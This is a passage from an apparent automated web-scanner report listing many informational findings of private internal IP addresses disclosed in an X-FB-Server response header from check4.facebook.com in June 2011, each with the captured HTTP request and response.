Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.51.31
X-Cnection: close
Date: Thu, 16 Jun 2011 16:07:42 GMT

/*1308240462,171324191*/

window._ip_w["check4"] = 0;

19.110. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.217.55

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.217.55
X-Cnection: close
Date: Thu, 16 Jun 2011 14:03:40 GMT

/*1308233020,171366711*/

window._ip_w["check4"] = 0;

19.111. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.14.75

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/widgets/recommendations.php?header=false&height=300&width=377&site=online.wsj.com&border_color=white
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.43.14.75
X-Cnection: close
Date: Thu, 16 Jun 2011 11:24:12 GMT

/*1308223452,170593867*/

window._ip_w["check4"] = 0;

19.112. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.174.49

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.174.49
X-Cnection: close
Date: Thu, 16 Jun 2011 18:11:52 GMT

/*1308247912,171879985*/

window._ip_w["check4"] = 0;

19.113. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.179.50

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.179.50
X-Cnection: close
Date: Thu, 16 Jun 2011 14:24:19 GMT

/*1308234259,171356978*/

window._ip_w["check4"] = 0;

19.114. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.152.35

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f82028f4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3774078cc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.152.35
X-Cnection: close
Date: Thu, 16 Jun 2011 17:45:58 GMT

/*1308246358,171350051*/

window._ip_w["check4"] = 0;

19.115. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.15.33

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.15.33
X-Cnection: close
Date: Thu, 16 Jun 2011 16:43:52 GMT

/*1308242632,171314977*/

window._ip_w["check4"] = 0;

19.116. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.7.60

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2dad6e6%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff367d4868%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.63.7.60
X-Cnection: close
Date: Thu, 16 Jun 2011 16:59:22 GMT

/*1308243562,171902780*/

window._ip_w["check4"] = 0;

19.117. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.18.52

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2724bfef%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b3573fd%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.18.52
X-Cnection: close
Date: Thu, 16 Jun 2011 18:17:04 GMT

/*1308248224,171315764*/

window._ip_w["check4"] = 0;

19.118. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.203.64

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.203.64
X-Cnection: close
Date: Thu, 16 Jun 2011 15:57:22 GMT

/*1308239842,171887424*/

window._ip_w["check4"] = 0;

19.119. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.161.44

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df102156e5c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1aa8c6f18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.161.44
X-Cnection: close
Date: Thu, 16 Jun 2011 14:45:02 GMT

/*1308235502,171876652*/

window._ip_w["check4"] = 0;

19.120. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.140.41

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3727f23f4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1317e5bb4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Fvideo%2Fhow-to-include-your-pet-in-your-wedding-party%2F8DE80DF5-6EA8-4B36-B310-BCA4427CCA14.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.43.140.41
X-Cnection: close
Date: Thu, 16 Jun 2011 11:24:16 GMT

/*1308223456,170626089*/

window._ip_w["check4"] = 0;

19.121. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.47.32

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.47.32
X-Cnection: close
Date: Thu, 16 Jun 2011 15:15:59 GMT

/*1308237359,171847456*/

window._ip_w["check4"] = 0;

19.122. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.146.58

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df652b1054%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a28c999%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.146.58
X-Cnection: close
Date: Thu, 16 Jun 2011 16:23:13 GMT

/*1308241393,171872826*/

window._ip_w["check4"] = 0;

19.123. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.242.43

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32d339e58%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb16b3e24%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.242.43
X-Cnection: close
Date: Thu, 16 Jun 2011 13:22:27 GMT

/*1308230547,171373099*/

window._ip_w["check4"] = 0;

19.124. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.203.39

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df125679654%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a2a76b2c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.203.39
X-Cnection: close
Date: Thu, 16 Jun 2011 18:11:56 GMT

/*1308247916,171887399*/

window._ip_w["check4"] = 0;

19.125. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.138.41

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.138.41
X-Cnection: close
Date: Thu, 16 Jun 2011 16:02:31 GMT

/*1308240151,171870761*/

window._ip_w["check4"] = 0;

19.126. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.141.54

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.141.54
X-Cnection: close
Date: Thu, 16 Jun 2011 13:58:30 GMT

/*1308232710,171347254*/

window._ip_w["check4"] = 0;

19.127. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.116.57

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e0633434%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27f0385c4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.116.57
X-Cnection: close
Date: Thu, 16 Jun 2011 12:04:45 GMT

/*1308225885,171340857*/

window._ip_w["check4"] = 0;

19.128. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.227.36

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.227.36
X-Cnection: close
Date: Thu, 16 Jun 2011 14:19:10 GMT

/*1308233950,171369252*/

window._ip_w["check4"] = 0;

19.129. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.219.38

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13acfec3%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb16b3e24%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.219.38
X-Cnection: close
Date: Thu, 16 Jun 2011 13:22:26 GMT

/*1308230546,171367206*/

window._ip_w["check4"] = 0;

19.130. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.186.39

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.186.39
X-Cnection: close
Date: Thu, 16 Jun 2011 18:53:14 GMT

/*1308250394,171358759*/

window._ip_w["check4"] = 0;

19.131. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.94.42

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3668299ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffe69f3b88%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.94.42
X-Cnection: close
Date: Thu, 16 Jun 2011 18:01:32 GMT

/*1308247292,171335210*/

window._ip_w["check4"] = 0;

19.132. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.176.110

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfedd4a6bc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb889e7%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
